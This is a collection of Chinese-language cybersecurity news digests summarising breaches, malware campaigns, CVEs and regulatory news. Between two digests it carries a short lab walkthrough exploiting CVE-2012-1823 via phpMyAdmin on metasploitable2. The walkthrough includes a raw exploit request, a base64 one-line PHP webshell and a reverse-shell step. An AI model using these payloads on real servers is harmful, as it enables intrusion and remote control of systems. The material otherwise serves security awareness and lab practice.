1、恶意脚本SNS Sender滥用AWS进行批量短信攻击 https://www.sentinelone.com/labs/sns-sender-active-campaigns-unleash-messaging-spam-through-the-cloud/ 一种名为SNS Sender 的恶意 Python 脚本被宣传为威胁行为者通过滥用 Amazon Web Services (AWS) 简单通知服务 ( SNS ) 发送批量短信的一种方式。短信网络钓鱼消息旨在传播恶意链接，这些链接旨在捕获受害者的个人身份信息 (PII) 和支付卡详细信息，研究人员将其归因于名为 ARDUINO_DAS 的威胁行为者。SNS Sender 也是在野观察到的 2、朝鲜黑客通过YoMix Tumbler清洗被盗的加密货币 https://www.chainalysis.com/blog/2024-crypto-money-laundering/ 朝鲜黑客组织 Lazarus 因多年来实施多次大规模加密货币盗窃而臭名昭著，现已转而使用 YoMix 比特币混合器来洗钱被盗收益。研究人员表示，2023 年，YoMix 出现了大量资金涌入，这并不是因为人气增加，而是因为 Lazarus 的活动。然而，每当一个平台受到制裁并与加密货币空间隔离时，拉撒路就会转向一个新的平台。 YoMix 是朝鲜威胁行为者使用的最新服务。研究人员对2023年洗钱活动向到更多服务存款地址蔓延，加上 Lazarus 集团的新策略，进行了深入分 3、大规模云数据库Zenlayer涉嫌泄露3.8亿条数据 https://www.hackread.com/massive-cloud-database-leak-exposes-380-records 网络安全研究员发现属于全球网络服务提供商 Zenlayer 的云数据库泄漏，该数据库未受到保护且配置错误。其中包含的敏感数据数量多达 3.8 亿条记录。在进一步深入服务器后发现，泄露的信息不仅涵盖了公司的内部运作，而且包含大量是客户数据。总共有 384,658,212 条记录，总计 57.46 GB。这个数据宝库没有受到基本密码的保护。它是公开的，任何人都可以访问，为威胁行为者的潜在利用敞开了大门。Zenlayer 是一家全球网络服务提供商，为电信 4、Zoom修补Windows应用程序中的关键权限提升漏洞 https://www.zoom.com/en/trust/security-bulletin/ZSB-24008/ Zoom 桌面和 VDI 客户端以及 Windows 会议 SDK 容易受到不正确的输入验证缺陷的影响，该缺陷可能允许未经身份验证的攻击者通过网络对目标系统进行权限升级。新披露的漏洞编号为CVE-2024-24691，由 Zoom 的进攻安全团队发现，CVSS v3.1 得分为 9.6，评级为“严重”。Zoom 会自动提示用户更新到最新版本。用户也可以手动下载并安装最新版本的 Windows 桌面客户端版本 5.17.7 。本次更新中除了解决验证不当的缺陷外，最新的 Zoom 5、黑客利用PlayDapp平台被盗私钥窃取17.9亿个加密代币 https://www.bleepingcomputer.com/news/security/hackers-mint-179-billion-crypto-tokens-from-playdapp-gaming-platform/ 黑客使用被盗的私钥铸造并窃取了超过 17.9 亿个 PLA 代币，这是 PlayDapp 生态系统中使用的加密货币。PlayDapp 是一个基于区块链的平台，可在游戏中使用和交易不可替代代币 (NFT)，允许用户无需中介即可在各种游戏中购买、出售和交易数字资产。2024 年 2 月 9 日，一个未经授权的钱包铸造了 2 亿枚 PLA 代币，当时价值 3650 万 6、Glupteba僵尸网络利用未记录的UEFI Bootkit逃避检测 https://unit42.paloaltonetworks.com/glupteba-malware-uefi-bootkit/ 研究人员发现Glupteba 僵尸网络包含了之前未记录的统一可扩展固件接口 ( UEFI ) bootkit 功能，为恶意软件增加了另一层复杂性和隐蔽性。这个 bootkit 可以干预和控制 [操作系统] 启动过程，使 Glupteba 能够隐藏自身并创建一种极难检测和删除的隐秘持久性。Glupteba 是一个功能齐全的信息窃取程序和后门，能够促进非法加密货币挖掘并在受感染的主机上部署代理组件。它利用比特币区块链作为备份命令和控制 (C2) 系统，使其能够适应 7、FCC要求电信运营商在30天内报告PII数据泄露事件 https://www.bleepingcomputer.com/news/security/fcc-orders-telecom-carriers-to-report-pii-data-breaches-within-30-days/ 美国联邦通信委员会（FCC）从 2024年 3 月 13 日开始，电信公司必须根据 FCC 更新的数据泄露报告要求，在 30 天内报告影响客户个人身份信息的数据泄露事件。FCC 的最终规则是在2024 年 1 月（一年前的2023 年1 月）发布的几项提案之后制定的，并于 2022 年 1 月首次分发，重点是使委员会的违规通知规则现代化，以便电信运营商必须尽 8、研究人员破解Rhysida勒索软件并免费发布解密工具 https://arxiv.org/abs/2402.06440 研究人员对 2023 年下半年造成重大损害的 Rhysida 勒索软件进行了调查，并提出了一种解密方法。Rhysida与另一个名为 Vice Society 的勒索软件团队有重叠，利用一种称为双重勒索的策略，通过威胁公布被盗数据来向受害者施加压力，迫使其付款。Rhysida 勒索软件采用安全随机数生成器来生成加密密钥，然后对数据进行加密。然而，该勒索软件存在一个实现漏洞，使能够在感染时重新生成随机数生成器的内部状态。研究人员使用重新生成的随机数生成器成功解密了数据。据知，这是 Rhysida 勒索软件首次成功解密。该研究也是继 9、攻击者利用Ivanti漏洞在670多个IT基础设施上安装后门 https://thehackernews.com/2024/02/ivanti-vulnerability-exploited-to.html 攻击者正在利用最近披露的影响 Ivanti Connect Secure、Policy Secure 和 ZTA 网关的安全漏洞，在易受影响的设备上部署代号为DSLog 的后门。研究人员表示在公开发布概念验证 (PoC) 代码后的几个小时内，就观察到了 CVE-2024-21893 的利用情况。DSLog 植入程序有自己的技巧来阻碍分析和检测，包括为每个设备嵌入一个唯一的哈希值，从而使得无法使用该哈希值来联系另一台设备上的相同后门。攻击者向设备发出 10、研究人员持续关注针对Microsoft Azure攻击活动 https://www.darkreading.com/cloud-security/senior-executives-targeted-ongoing-azure-account-takeover 在针对Microsoft Azure 企业云的持续攻击活动中，数十个环境和数百个个人用户帐户已受到损害。该活动在某些方面是分散的而经过精心设计的，涉及数据泄露、财务欺诈、冒充等，针对不同地理区域和行业垂直领域的组织，并针对沿途具有高度战略意义的个人进行量身定制的网络钓鱼。虽然攻击者的做法可能显得投机取巧，但广泛的妥协后活动表明攻击者的复杂程度越来越高。威胁行为者通过从不同的工具包中选择适当的工 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。

1、RAT恶意软件伪装成赌博相关内容进行传播 https://asec.ahnlab.com/ko/61250/ 研究人员发现RAT恶意软件正在伪装成非法赌博相关文件进行传播。与上个月发布的 VenomRAT 分发方法相同，它通过快捷方式（.lnk）文件进行分发，并直接从 HTA 下载 RAT 恶意软件。确认分发的快捷方式文件包含恶意Powershell命令，并运行MSHTA下载恶意脚本。已确认的诱饵文件还包含与赌博网站相关的信息，并包括一些用户的个人信息。 2、黑客声称窃取HPE公司数据并在黑客论坛出售 https://www.bleepingcomputer.com/news/security/hpe-investigates-new-breach-after-data-for-sale-on-hacking-forum/ 威胁行为者将涉嫌窃取的数据在黑客论坛上出售，声称其中包含 HPE （慧与公司）凭据和其他敏感信息，并在 IntelBroker 分享了一些据称被盗的 HPE 凭证的屏幕截图，这些数据包括：CI/CD 访问、系统日志、配置文件、访问令牌、HPE StoreOnce 文件（序列号授权等）和访问密码。（还包括电子邮件服务）。”慧与公司 (HPE) 正在调查潜在的新漏洞。该公司 3、Pegasus间谍软件攻击约旦记者等活动人士iPhone设备 https://www.accessnow.org/press-release/pegasus-spyware-jordan/ 根据 Access Now 和 Citizen Lab 的联合调查结果，约旦近三成记者、活动人士、人权律师和民间社会成员的 iPhone 已成为 NSO Group 的 Pegasus 间谍软件的目标。35 人中有 9 人已被公开确认为攻击目标，受害者的设备受到了监控软件工具的攻击。NSO 集团表示：“从技术上来说，Pegasus 不可能添加、更改、删除或以其他方式操纵目标移动设备上的数据，或者执行除查看和/或提取某些数据之外的任何其他活动。”尽管做出了这些保证，但 4、Linux基金会与AWS等科技巨头成立后量子密码学联盟 https://www.securityweek.com/tech-giants-form-post-quantum-cryptography-alliance/ Linux 基金会今天宣布成立后量子密码学联盟 (PQCA)，该联盟旨在推进和推动后量子密码学的采用。PQCA由 AWS、思科、IBM、IntellectEU、Nvidia、QuSecure、SandboxAQ 和滑铁卢大学创立，将专注于解决量子计算带来的安全挑战。 5、佳能修补小型办公打印机中的 7 个严重漏洞 https://www.securityweek.com/canon-patches-7-critical-vulnerabilities-in-small-office-printers/ 日本电子产品制造商佳能周一宣布了软件更新，修复了影响几种小型办公打印机型号的七个严重漏洞。这些被描述为缓冲区溢出错误的问题可以通过网络进行远程代码执行 (RCE) 或导致易受攻击的产品变得无响应。 6、Android 中的严重远程代码执行漏洞已修复 https://www.securityweek.com/critical-remote-code-execution-vulnerability-patched-in-android/ 谷歌周一宣布修复 Android 中的 46 个漏洞，其中包括一个导致远程代码执行的严重错误。该漏洞编号为 CVE-2024-0031，影响 Android 开源项目 (AOSP) 版本 11、12、12L、13 和 14，已在平台的系统组件中发现。 7、谷歌 TAG 发现的大多数零日漏洞幕后都是商业间谍软件供应商 https://securityaffairs.com/158750/hacking/commercial-spyware-vendors-zero-day.html 谷歌威胁分析小组（TAG）发布的最新报告，题为“购买间谍活动，一份深入报告，深入了解商业监视供应商（CSV）”，商业间谍软件供应商 (CSV) 是 2023 年发现的大多数零日漏洞的幕后黑手。 8、Fortinet FortiSIEM产品中发现两个高危漏洞 https://www.theregister.com/2024/02/06/fortinet_fortisiem_vulns Fortinet 的 FortiSIEM 产品被发现存在两个新的严重漏洞：CVE-2024-23108 和 CVE-2024-23109，允许未经身份验证的攻击者远程执行代码。 9、2023 年教育行业勒索软件攻击激增 92% https://www.freebuf.com/articles/network/390823.html 2023 年是教育行业有记录以来勒索威胁最严重的一年。根据 ThreatDown 的数据，教育行业遭到的勒索攻击在过去的一年中激增 70%。从 2022 年的 129 起事件，增加到 2023 年的 265 起。 10、 数以千计被盗的 AnyDesk 登录凭证在暗网上出售 https://www.hackread.com/anydesk-logins-credentials-sold-on-dark-web/ 网络安全研究人员在俄语暗网论坛上发现了多个黑客，他们正在积极出售 AnyDesk 帐户，帐户数量从 18000 个到 30000 个不等。 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。

1、攻击者利用假语音邮件作为凭据收集的诱饵 https://www.avanan.com/blog/fake-voicemail-as-credential-harvesting-lure 黑客会尝试一切手段来让受害者点击恶意链接。近期一种策略是使用语音邮件作为诱饵来吸引用户点击。许多公司电话系统都与电子邮件绑定在一起——可以通过电子邮件收听留在电话上的语音邮件。黑客正在利用这一点，将看似语音邮件录音的内容添加到恶意页面的超链接中。 在过去两周内，研究人员发现了 1,000 起此类攻击。 黑客利用虚假的语音邮件链接来窃取凭据。在电子邮件中嵌入 MP3 播放器等模仿语音邮件。 但当单击它时，会被重定向到一个网页，即凭据收集页面。 建议通 2、在多国联合打击全球网络犯罪行动中共31人被捕 https://www.interpol.int/en/News-and-Events/News/2024/INTERPOL-led-operation-targets-growing-cyber-threats 50 个国家/地区的执法部门在针对勒索软件、银行恶意软件和网络钓鱼的全球行动中逮捕了 31 人。该行动名为 Synergia，于 2023 年 9 月至 11 月期间运行，识别出 1,300 多个可疑命令与控制 (C&C) 服务器，其中 70% 已被关闭。国际刑警组织牵头的行动扩展到亚太地区、欧洲、中东和非洲等地区，涉及 50 个参与国家的 60 个执法机构。大多数被关闭的 C&C 3、Uber因处理个人数据缺乏透明度被处以1000万欧元罚款 https://www.securityweek.com/netherlands-fines-uber-over-data-protection/ 荷兰监管机构 (DPA) 对打车应用 Uber 处以 1000 万欧元（1080 万美元）罚款，原因是其司机个人数据处理缺乏透明度。该机构在一份声明中表示：“DPA 发现 Uber 让司机提交查看或接收个人数据副本的请求变得不必要的复杂化。”。Uber当前已采取措施改善情况，并对这一决定提出上诉。该公司在一份声明中表示，DPA“承认 Uber 解决了司机提出的少数‘低影响’问题，同时驳回了他们的绝大多数说法，认为这些说法毫无根据。” 4、三菱电机工厂自动化漏洞允许远程攻击工程工作站 https://www.securityweek.com/mitsubishi-electric-factory-automation-flaws-expose-engineering-workstations/ 日本电子和电气设备制造公司三菱电机生产的工厂自动化产品中发现了两个潜在的严重漏洞。三菱电机在上周发布的一份公告中表示，一些工厂自动化 (FA) 产品受到高严重性身份验证绕过和关键远程代码执行漏洞的影响。 5、谷歌开源基于人工智能辅助的Fuzz框架 https://www.securityweek.com/google-open-sources-ai-aided-fuzzing-framework/ 为了帮助开发人员和研究人员更快地发现漏洞，谷歌发布了开源的人工智能辅助模糊测试框架。该工具利用大型语言模型 (LLM) 为现实世界的 C 和 C++ 项目生成模糊目标，并使用 Google 的 OSS-Fuzz 服务对其进行基准测试，该服务长期以来一直用于自动发现开源软件中的漏洞。 6、专家警告针对 Ivanti SSRF 漏洞的攻击激增 https://securityaffairs.com/158677/hacking/ivanti-ssrf-cve-2024-21893-under-attack.html 编号为 CVE-2024-21893 的 Ivanti SSRF 漏洞在野外攻击中被多个威胁参与者积极利用。上周，Ivanti 警告 其 Connect Secure 和 Policy Secure 解决方案中存在两个新的高严重性漏洞，分别为 CVE-2024-21888（CVSS 评分：8.8）和 CVE-2024-21893（CVSS 评分：8.2）。该软件公司还警告说，这两个漏洞之一正在被积极利用。 7、骗子用"深度伪造"视频通话从一家跨国公司窃取了2550万美元 https://securityaffairs.com/158651/cyber-crime/cyber-heist-with-deepfake-tech.html 诈骗者利用深度伪造视频通话欺骗员工转移资金，成功从香港一家跨国公司窃取了 2 亿港元（约合 2550 万美元）。该员工参加了一次视频电话会议，视频中显示了公司首席财务官 (CFO) 和其他员工，指示他转移资金。 8、新的Mispadu银行木马利用Windows SmartScreen漏洞 https://unit42.paloaltonetworks.com/mispadu-infostealer-variant/ Windows SmartScreen 漏洞 CVE-2023-36025 允许威胁行为者绕过警告并使用精心设计的 .url 文件执行恶意负载，从而给 Windows 用户带来重大安全风险。 9、Windows Server 2025即将引入Linux sudo 功能 https://www.freebuf.com/news/391509.html 目前，微软正在将 Linux 的 "sudo "功能引入 Windows Server 2025，为管理员提升控制台应用程序的权限提供了一种新方法。 10、美国清洁用品巨头高乐氏因网络攻击损失 4900 万美元 https://www.bleepingcomputer.com/news/security/clorox-says-cyberattack-caused-49-million-in-expenses/ 高乐氏公司称去年 9 月的一次网络攻击迄今已造成该公司 4900 万美元的损失，高乐氏作为一家美国消费和专业清洁产品制造商，拥有 8700 名员工，2023 年收入近 75 亿美元。 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。

1、Cloudflare内部服务器Atlassian遭到网络攻击 https://blog.cloudflare.com/thanksgiving-2023-security-incident Cloudflare披露，其内部 Atlassian 服务器被一名疑似“民族国家攻击者”入侵，该攻击者访问了其 Confluence wiki、Jira 错误数据库和 Bitbucket 源代码管理系统。并使用 ScriptRunner for Jira 建立了对Atlassian 服务器的持久访问，获得了源代码管理系统（使用 Atlassian Bitbucket）的访问权限，并尝试访问有权访问 Atlassian 服务器的控制台服务器，但没有成功。此次攻击行为并 2、HeadCrab新变种实现无文件化持续攻击Redis服务器 https://blog.aquasec.com/headcrab-2.0-evolving-threat-in-redis-malware-landscape 研究人员发现 HeadCrab 恶意软件新变种，该恶意软件自 2021 年 9 月初以来一直以全球的 Redis 数据库服务器为目标，并将其编入僵尸网络以非法挖掘加密货币，同时还以允许威胁参与者执行 shell 命令、加载无文件内核模块以及将数据渗漏到远程的方式利用访问权限。研究人员分析了 HeadCrab 2.0 的复杂细节，揭示了其先进的机制，并表示新变种能够以合法命令的名义伪装其恶意活动，这给检测带来了新的问题。与去年相比，受 3、新型恶意软件CommandoCat定向攻击暴露的Docker API端点 https://thehackernews.com/2024/02/exposed-docker-apis-under-attack-in.html 研究人员发现一种名为“Commando Cat”的新型恶意软件活动，其目标是暴露的 Docker API 端点。Commando Cat 是一个加密劫持活动，利用 Docker 作为初始访问向量，并（ab）使用该服务挂载主机的文件系统，然后直接在主机上运行一系列相互依赖的有效负载。 这些负载负责注册持久性、启用后门、泄露各种云服务提供商凭证文件并执行矿工本身，该恶意软件展示的许多规避技术，包括不寻常的进程隐藏机制。 该组织有可能是众多模仿 Te 4、ALPHV勒索组织声称窃取Technica机构300GB数据并威胁泄露 https://cyberscoop.com/technica-pentagon-alphv-ransomware/ ALPHV或BlackCat的勒索软件组织声称，已经从Technica窃取300 GB 的关于国防情报和安全局相关的数据。Technica 是一家总部位于弗吉尼亚州的 IT 服务机构，负责进行背景调查和内部威胁分析。ALPHV 勒索组织发布了二十多张据称被盗文件的屏幕截图，其中包含数十人的姓名、社会安全号码、许可级别以及角色和工作地点。这些屏幕截图包括账单发票、从联邦调查局到美国空军等实体的合同，以及与美国政府签订合同的私人实体和设施的相关信息。该组织在与文件一起发布的消息中 5、与印度有关的黑客利用间谍软件进行定向攻击 https://therecord.media/india-linked-hackers-target-pakistan-with-spyware 研究人员发现疑似印度国家资助的黑客利用爱情骗局来引诱巴基斯坦的受害者安装恶意应用程序，从而用间谍恶意软件感染他们的设备。该组织名为 Patchwork，创建了至少 12 个恶意 Android 应用程序，包括 MeetMe、Let's Chat、Quick Chat 和 Rafaqat，并通过 Google Play 和其他平台分发这些应用程序。据统计这些应用程序被下载了 1,400 多次，目前已被谷歌标记为恶意并删除。一些黑客的受害者位于马来西 6、DarkGate恶意软件利用Microsoft Teams进行分发 https://cyware.com/news/darkgate-malware-delivered-via-microsoft-teams-f7b25750 研究人员发现了一次网络钓鱼攻击，该攻击利用 Microsoft Teams 聊天组将 DarkGate 恶意软件推送到受害者的系统上。攻击者使用名为 .onmicrosoft.com 的域发送网络钓鱼消息，诱骗用户下载欺骗性文件。据研究人员称，攻击者利用受感染的域发送了 1000 多个恶意 Teams 群聊邀请。 一旦收件人接受聊天请求，攻击者就会说服他们下载带有欺骗性双扩展名的文件：“Navigating Future Change 7、AnyDesk证实黑客入侵了其生产服务器并重置了密码 https://anydesk.com/en/public-statement AnyDesk证实最近遭受了一次网络攻击黑客访问该公司的生产系统，研究人员获悉，其源代码和私有代码签名密钥在攻击期间被盗。AnyDesk 是一种远程访问解决方案，允许用户通过网络或互联网远程访问计算机，用户企业使用它来提供远程支持或访问托管服务器。AnyDesk 表示他们已吊销与安全相关的证书，并根据需要修复或更换系统。他们还向客户保证 AnyDesk 可以安全使用，并且没有证据表明最终用户设备受到该事件的影响。虽然该公司表示没有身份验证令牌被盗，但出于谨慎考虑，AnyDesk 正在撤销其门户网站的所有密码，并建 8、后门激活恶意软件在macOS应用程序中泛滥 https://www.sentinelone.com/blog/backdoor-activator-malware-running-rife-through-torrents-of-macos-apps/ Activator macOS 后门背后的威胁参与者正在使用盗版应用程序来分发恶意软件，这可能是僵尸网络构建操作。此次活动不同之处在于其庞大的规模和新颖的多级有效负载传输技术。另外值得注意的是，威胁行为者使用破解的 macOS 应用程序，这些应用程序的标题可能是企业用户感兴趣的，因此不限制用户下载内容的组织也可能面临风险。 9、关键漏洞允许攻击者远程接管Mastodon账户 https://www.theregister.com/2024/02/02/critical_vulnerability_in_mastodon_is/ Mastodon 是免费开源的去中心化社交网络平台，近期修复了一个严重漏洞，该漏洞标记为CVE-2024-23832，在 CVSS v3.1 中的评级为 9.4，影响 3.5.17、4.0.13、4.1.13 和 4.2.5 之前的所有 Mastodon 版本，允许攻击者冒充并接管任何远程帐户。该漏洞已于发布的 4.2.5 版本中得到修复，建议所有 Mastodon 服务器管理员尽快升级到该版本以保护用户。Mastodon 暂时隐瞒了技术 10、Clorox公司确认2023年因网络攻击造成4900万美元损失 https://www.bleepingcomputer.com/news/security/clorox-says-cyberattack-caused-49-million-in-expenses/ 高乐氏 (Clorox) 披露，到 2023 年底，该公司因网络攻击而产生了 4900 万美元的费用。“产生的成本主要与第三方咨询服务有关，包括 IT 恢复和取证专家以及为调查和补救攻击而产生的其他专业服务，以及因公司业务运营中断而产生的增量运营成本，”虽然 Clorox 没有提供有关此次攻击的更多细节，但据悉此次攻击是由名为Scattered Spider（分散蜘蛛） 的黑客组织实施的 。 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。

1、Mastodon 修复了一个可能允许接管任何帐户的漏洞 https://securityaffairs.com/158565/hacking/mastodon-take-over-issue.html 威胁行为者可以利用影响去中心化社交网络 Mastodon 的漏洞来冒充并接管任何帐户。 2、黑客使用Okta泄露的凭据访问了Cloudflare内部系统 https://www.securityweek.com/okta-broadens-scope-of-data-breach-all-customer-support-users-affected/ 威胁行为者使用 Okta 黑客攻击期间窃取的凭据访问了内部 Cloudflare 系统。 3、AnyDesk 称黑客入侵其生产服务器并重置密码 https://www.bleepingcomputer.com/news/security/anydesk-says-hackers-breached-its-production-servers-reset-passwords/ 攻击者窃取了源代码和代码签名证书。 AnyDesk 的回应是撤销安全证书、更换系统并向客户保证使用该软件是安全的。 4、乌克兰政府协同民间黑客全面升级与俄罗斯的网络战 https://www.secrss.com/articles/63406 自 2023 年 11 月 23 日，乌克兰政府首次官方承认对俄罗斯目标开展网络攻击以来，乌克兰军事情报机构、国家安全机构以及亲乌克兰黑客组织对俄罗斯开展了九次具有严重破坏性影响的网络攻击。 5、DarkGate 恶意软件正在通过微软群聊进行大肆传播 https://www.bleepingcomputer.com/news/security/microsoft-teams-phishing-pushes-darkgate-malware-via-group-chats/ AT&T Cybersecurity 的研究显示，有一种新的网络钓鱼攻击通过 Microsoft Teams 群组聊天请求推送恶意附件，从而在受害者系统中安装 DarkGate 恶意软件。 6、CISA 发出警告，iPhone 内核漏洞正在被利用 https://www.bleepingcomputer.com/news/security/cisa-warns-of-patched-iphone-kernel-bug-now-exploited-in-attacks/ CISA 近期警告称，一个影响苹果 iPhone、Mac、 TVs 和手表的内核安全漏洞正在被威胁攻击者积极利用。 7、全球五大互联网注册商中四个的1500多个客户凭证泄露 https://www.anquanke.com/post/id/293029 Resecurity 专家已发现暗网上五个最大互联网注册商 ( RIR ) 中四个的 1570 多个客户凭证遭到泄露，其中包括：RIPE、APNIC、AFRINIC和LACNIC，只有负责北美地区的 ARIN。幸免于难。 8、专家称 FritzFrog 僵尸网络正在利用 Log4Shell 漏洞 https://therecord.media/botnet-fritzfrog-log4shell-exploitation-internal-networks 僵尸网络在名为“Frog4Shell”的活动中转向针对易受攻击的 Java 应用程序，这对可能被忽视且未修补的内部计算机构成了重大风险。 9、联通成立安全子公司，三大运营商加大网安战略投入 https://www.secrss.com/articles/63451 2024年1月26日，联通（广东）网络信息安全科技有限公司成立，注册资本10亿元。 10、 网信办2023 年约谈网站 10646 家关闭违法违规账号127878个 https://www.ithome.com/0/748/264.htm 据中央网信办公告，2023 年全国网信系统严格执行法律法规，大力查处各类网上违法违规行为，全年共约谈网站 10646 家。 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。

1、意大利多个企业受到USB传播加密劫持恶意软件攻击 https://www.mandiant.com/resources/blog/unc4990-evolution-usb-malware 一个名为UNC4990的威胁行为体，出于经济动机正在利用武器化 USB 设备作为初始感染媒介攻击意大利的多个组织。这些攻击针对多个行业，包括医疗、交通、建筑和物流。UNC4990 操作通常涉及广泛的 USB 感染，然后部署 EMPTYSPACE 下载程序。攻击操作集群依赖 GitHub、Vimeo 和 Ars Technica 等第三方网站来托管编码的附加阶段，并在执行链的早期通过 PowerShell 下载和解码。目前尚不清楚 UNC4990的最终目标 2、巴西联邦调查局捣毁Grandoreiro银行木马 https://www.gov.br/pf/pt-br/assuntos/noticias/2024/01/pf-combate-organizacao-criminosa-que-praticava-fraudes-bancarias-eletronicas-contra-vitimas-no-exterior Grandoreiro是 Javali、Melcoz、Casabeniero、Mekotio 和 Vadokrist 等众多拉丁美洲银行木马之一，主要针对西班牙、墨西哥、巴西和阿根廷等国家。该木马自 2017 年以来一直活跃，其既可以通过键盘记录器和屏幕截图窃取数据，也可以在受感染 3、CISA警告Apple iOS和macOS中的严重缺陷被积极利用 https://thehackernews.com/2024/02/cisa-warns-of-active-exploitation-of.html 美国网络安全和基础设施安全局 (CISA) 周三根据活跃利用的证据，将影响 iOS、iPadOS、macOS、tvOS 和 watchOS 的高严重性缺陷添加到其已知可利用漏洞 ( KEV ) 目录中。该漏洞编号为CVE-2022-48618（CVSS 评分：7.8），涉及内核组件中的错误。鉴于 CVE-2022-48618 的活跃利用，CISA 建议联邦民事行政部门 (FCEB) 机构在 2024 年 2 月 21 日之前应用修复程序。 4、研究人员发现攻击者可利用RunC漏洞获得主机访问权限 https://snyk.io/blog/leaky-vessels-docker-runc-container-breakout-vulnerabilities/ runC是一个用于在 Linux 上生成和运行容器的工具。最初是作为 Docker 的一部分开发的，后于 2015 年分离成一个单独的开源库。runC 命令行工具中已披露多个安全漏洞，威胁者可利用这些漏洞逃离容器的边界并发起后续攻击。这些漏洞编号为 CVE-2024-21626、CVE-2024-23651、CVE-2024-23652 和 CVE-2024-23653，被网络安全供应商 Snyk统称为Leaky Vessels 5、至少30名记者、律师和活动人士在约旦遭到Pegasus攻击 https://www.securityweek.com/at-least-30-journalists-lawyers-and-activists-hacked-with-pegasus-in-jordan-forensic-probe-finds/ NSO 集团的 Pegasus 间谍软件在约旦被用来侵入记者、律师、人权和政治活动人士的手机。 6、江森自控称勒索软件攻击已造成 2700 万美元损失 https://www.freebuf.com/news/391141.html 据BleepingComputer 消息，江森自控国际公司 (Johnson Controls International) 确认，2023 年 9 月的一次勒索软件攻击给该公司造成了至少2700 万美元的损失，并导致了数据泄露。 7、工信部关于印发工业控制系统网络安全防护指南的通知 https://wap.miit.gov.cn/zwgk/zcwj/wjfb/tz/art/2024/art_b9415a5455934902b04961909b1c2873.html 为适应新时期工业控制系统网络安全（以下简称工控安全）形势，进一步指导企业提升工控安全防护水平，夯实新型工业化发展安全根基，制定本指南。 8、阿联酋政府网络安全首席称，他们每天面临5万次网络攻击 https://www.darkreading.com/cyber-risk/uae-government-cyber-chief-50k-cyberattacks-daily 他们所面临的威胁类型包括从端口扫描和钓鱼邮件到DDoS攻击和勒索软件等，这些威胁对政府的多个领域产生了影响。 9、全国信安标委发布7项网络安全推荐性国家标准计划 https://www.freebuf.com/news/391086.html 请项目所属工作组制定项目推进计划，并督促项目牵头承担单位按计划抓紧落实，在计划执行中要加强协调，广泛征求意见，确保标准质量和水平，按要求完成国家标准制修订任务。 10、意大利数据保护监管机构指控 ChatGPT 侵犯隐私 https://thehackernews.com/2024/01/italian-data-protection-watchdog.html 意大利数据保护机构已通知 ChatGPT 的制造商 OpenAI，该公司可能违反欧盟 GDPR 隐私法。这些问题包括收集个人数据、年龄保护以及敏感信息的潜在暴露。 声明 以上内容原文来自互联网的公共方式，仅用于有限分享，译文内容不代表蚁景科技观点，因此第三方对以上内容进行分享、传播等行为，以及所带来的一切后果与译者和蚁景科技无关。以上内容亦不得用于任何商业目的，若产生法律责任，译者与蚁景科技一律不予承担。

前言 做渗透测试的时候偶然发现，phpmyadmin少见的打法，以下就用靶场进行演示了。 0x01漏洞发现 环境搭建使用metasploitable2,可在网上搜索下载，搭建很简单这里不多说了。 发现phpmyadmin，如果这个时候无法登陆，且也没有前台的漏洞，可以继续在这个phpmyadmin目录下做文章。 发现setup 0x02漏洞利用 进行漏洞利用 https://juejin.cn/post/7042901479388086285POST /phpMyAdmin/?-d+allow_url_include%3d1+-d+auto_prepend_file%3dphp://input HTTP/1.1 Host: 192.168.48.143 Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.121 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,\*/\*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: phpMyAdmin=bdbb427ed9c5e8616fe90261adcfb7229d6ca189; pma_lang=en-utf-8 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 36 \<?php passthru(\'id\'); die(); ?\> 这里利用的是CVE-2012-1823 ?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input 解码后 ?-d allow_url_include=on -d auto_prepend_file=php://input 开启allow_url_include和auto_prepend_file 其中allow_url_include可以远程文件包含，auto_prepend_file加载php://input 其中php://input 可以读取http entitybody中指定长度的值，由Content-Length指定长度 写一句话木马getshell echo "PD9waHAgZXZhbCgkX1BPU1RbMV0pOyA/Pg==" | base64 -d >shell.php 0x03反弹shell 利用kali现成的 cp /usr/share/webshells/php/php-reverse-shell.php ./1.php 修改这个ip 修改ip 反弹shell成功，且无文件生成。

1、攻击者滥用Microsoft Teams群聊传播DarkGate恶意软件 https://cybersecurity.att.com/blogs/security-essentials/darkgate-malware-delivered-via-microsoft-teams-detection-and-response 新的网络钓鱼攻击滥用 Microsoft Teams 群聊请求来推送恶意附件，在受害者的系统上安装 DarkGate 恶意软件负载。攻击者使用看似受感染的 Teams 用户（或域）发送了 1000 多个恶意 Teams 群聊邀请。目标接受聊天请求后，威胁行为者会诱骗他们使用名为“Navigating Future Changes October 2、奔驰企业网络GitHub令牌配置错误导致源代码泄露 https://redhuntlabs.com/blog/mercedes-benz-source-code-at-risk-github-token-mishap-sparks-major-security-concerns/ 处理不当的 GitHub 令牌可以不受限制地访问梅赛德斯-奔驰的内部 GitHub Enterprise 